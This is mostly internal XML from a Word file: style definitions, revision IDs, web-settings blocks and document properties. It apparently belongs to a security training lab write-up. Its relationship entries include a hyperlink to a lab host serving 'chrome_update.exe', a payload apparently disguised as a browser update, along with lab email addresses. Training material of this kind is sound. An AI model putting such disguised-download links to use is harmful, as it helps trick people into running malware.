    <w:rsid w:val="00B4458F"/>
    <w:rsid w:val="00B53A54"/>
    <w:rsid w:val="00B634A3"/>
    <w:rsid w:val="00B64404"/>
    <w:rsid w:val="00B72511"/>
    <w:rsid w:val="00B75E87"/>
    <w:rsid w:val="00B7689F"/>
    <w:rsid w:val="00B77A37"/>
    <w:rsid w:val="00B839D5"/>
    <w:rsid w:val="00B87F1F"/>
    <w:rsid w:val="00B913C4"/>
    <w:rsid w:val="00B95301"/>
    <w:rsid w:val="00B97BF5"/>
    <w:rsid w:val="00BA230E"/>
    <w:rsid w:val="00BB17D9"/>
    <w:rsid w:val="00BC0DD1"/>
    <w:rsid w:val="00BC5257"/>
    <w:rsid w:val="00BD11C3"/>
    <w:rsid w:val="00BD1A97"/>
    <w:rsid w:val="00BD4340"/>
    <w:rsid w:val="00BE6D2A"/>
    <w:rsid w:val="00BF7833"/>
    <w:rsid w:val="00BF7C2F"/>
    <w:rsid w:val="00C00D12"/>
    <w:rsid w:val="00C03C8E"/>
    <w:rsid w:val="00C1032A"/>
    <w:rsid w:val="00C11F4F"/>
    <w:rsid w:val="00C127EF"/>
    <w:rsid w:val="00C15324"/>
    <w:rsid w:val="00C23D7B"/>
    <w:rsid w:val="00C30858"/>
    <w:rsid w:val="00C331AC"/>
    <w:rsid w:val="00C35EE5"/>
    <w:rsid w:val="00C37C9A"/>
    <w:rsid w:val="00C40746"/>
    <w:rsid w:val="00C4394F"/>
    <w:rsid w:val="00C44632"/>
    <w:rsid w:val="00C4612C"/>
    <w:rsid w:val="00C567D6"/>
    <w:rsid w:val="00C62672"/>
    <w:rsid w:val="00C645FC"/>
    <w:rsid w:val="00C66798"/>
    <w:rsid w:val="00C748A1"/>
    <w:rsid w:val="00C81999"/>
    <w:rsid w:val="00C8563B"/>
    <w:rsid w:val="00C874E8"/>
    <w:rsid w:val="00C93EDE"/>
    <w:rsid w:val="00C95C68"/>
    <w:rsid w:val="00C97ECA"/>
    <w:rsid w:val="00CA2A19"/>
    <w:rsid w:val="00CB46FF"/>
    <w:rsid w:val="00CC2CFA"/>
    <w:rsid w:val="00CC4C4B"/>
    <w:rsid w:val="00CC6C94"/>
    <w:rsid w:val="00CC796D"/>
    <w:rsid w:val="00CD1987"/>
    <w:rsid w:val="00CD1EAB"/>
    <w:rsid w:val="00CD2538"/>
    <w:rsid w:val="00CD32C1"/>
    <w:rsid w:val="00CE32EB"/>
    <w:rsid w:val="00CE3331"/>
    <w:rsid w:val="00CF1A63"/>
    <w:rsid w:val="00CF33F1"/>
    <w:rsid w:val="00CF3565"/>
    <w:rsid w:val="00CF6334"/>
    <w:rsid w:val="00CF6E4C"/>
    <w:rsid w:val="00D00FB0"/>
    <w:rsid w:val="00D14135"/>
    <w:rsid w:val="00D15AE0"/>
    <w:rsid w:val="00D1711E"/>
    <w:rsid w:val="00D232DD"/>
    <w:rsid w:val="00D27AC8"/>
    <w:rsid w:val="00D30012"/>
    <w:rsid w:val="00D3008E"/>
    <w:rsid w:val="00D360F5"/>
    <w:rsid w:val="00D372E2"/>
    <w:rsid w:val="00D37B8F"/>
    <w:rsid w:val="00D521CF"/>
    <w:rsid w:val="00D5584C"/>
    <w:rsid w:val="00D729F5"/>
    <w:rsid w:val="00D80B1B"/>
    <w:rsid w:val="00D80EF2"/>
    <w:rsid w:val="00D841C6"/>
    <w:rsid w:val="00D8498F"/>
    <w:rsid w:val="00D85A07"/>
    <w:rsid w:val="00D87A16"/>
    <w:rsid w:val="00D924ED"/>
    <w:rsid w:val="00D92D2A"/>
    <w:rsid w:val="00DB08F6"/>
    <w:rsid w:val="00DB41C9"/>
    <w:rsid w:val="00DB619F"/>
    <w:rsid w:val="00DC7E7E"/>
    <w:rsid w:val="00DD7DC9"/>
    <w:rsid w:val="00DE0241"/>
    <w:rsid w:val="00DE253C"/>
    <w:rsid w:val="00E0359F"/>
    <w:rsid w:val="00E12743"/>
    <w:rsid w:val="00E13C8C"/>
    <w:rsid w:val="00E166C2"/>
    <w:rsid w:val="00E17DBC"/>
    <w:rsid w:val="00E204D2"/>
    <w:rsid w:val="00E254BD"/>
    <w:rsid w:val="00E33098"/>
    <w:rsid w:val="00E34555"/>
    <w:rsid w:val="00E41A27"/>
    <w:rsid w:val="00E42462"/>
    <w:rsid w:val="00E45354"/>
    <w:rsid w:val="00E51A8D"/>
    <w:rsid w:val="00E52D0A"/>
    <w:rsid w:val="00E57366"/>
    <w:rsid w:val="00E7040D"/>
    <w:rsid w:val="00E706C9"/>
    <w:rsid w:val="00E80AD1"/>
    <w:rsid w:val="00E90810"/>
    <w:rsid w:val="00E957E7"/>
    <w:rsid w:val="00E96AF9"/>
    <w:rsid w:val="00EA275D"/>
    <w:rsid w:val="00EA6EB0"/>
    <w:rsid w:val="00EB2E07"/>
    <w:rsid w:val="00EC2FA6"/>
    <w:rsid w:val="00ED035E"/>
    <w:rsid w:val="00ED15CF"/>
    <w:rsid w:val="00ED1CCC"/>
    <w:rsid w:val="00ED1F4A"/>
    <w:rsid w:val="00EE1783"/>
    <w:rsid w:val="00EE2976"/>
    <w:rsid w:val="00EE44B1"/>
    <w:rsid w:val="00EF3DD2"/>
    <w:rsid w:val="00EF488F"/>
    <w:rsid w:val="00EF4C60"/>
    <w:rsid w:val="00F05659"/>
    <w:rsid w:val="00F06909"/>
    <w:rsid w:val="00F158CB"/>
    <w:rsid w:val="00F21800"/>
    <w:rsid w:val="00F32E78"/>
    <w:rsid w:val="00F344AA"/>
    <w:rsid w:val="00F35639"/>
    <w:rsid w:val="00F36876"/>
    <w:rsid w:val="00F43B9B"/>
    <w:rsid w:val="00F50DB7"/>
    <w:rsid w:val="00F55877"/>
    <w:rsid w:val="00F613E9"/>
    <w:rsid w:val="00F663C6"/>
    <w:rsid w:val="00F806EA"/>
    <w:rsid w:val="00F833E7"/>
    <w:rsid w:val="00F83721"/>
    <w:rsid w:val="00F837AD"/>
    <w:rsid w:val="00F92FAC"/>
    <w:rsid w:val="00F948A1"/>
    <w:rsid w:val="00F954CE"/>
    <w:rsid w:val="00FA06B9"/>
    <w:rsid w:val="00FA63E9"/>
    <w:rsid w:val="00FA6911"/>
    <w:rsid w:val="00FC1610"/>
    <w:rsid w:val="00FC205C"/>
    <w:rsid w:val="00FD3637"/>
    <w:rsid w:val="00FD41BF"/>
    <w:rsid w:val="00FE2654"/>
    <w:rsid w:val="00FE275B"/>
    <w:rsid w:val="00FF3DB4"/>
    <w:rsid w:val="00FF42A0"/>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0B"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>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DE"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>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DE"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>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DE"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="003467DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00201A21"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>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791288335">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266109992">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1302274257">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2307407">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870290005">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1980837477">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24554208">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062318003">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2067608012">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2133745786">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10.10.10.1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hetoppers.ht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oe@10.10.10.10" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.10.10.10:1212/chrome_update.exe" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:admin@10.10.10.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 TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.johnbryce.co.i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10.10.10.10/mul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0</Pages>
  <Words>7895</Words>
  <Characters>45006</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>375</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239</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T11:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T10:46:00Z</dcterms:modified>
</cp:coreProperties>
</file>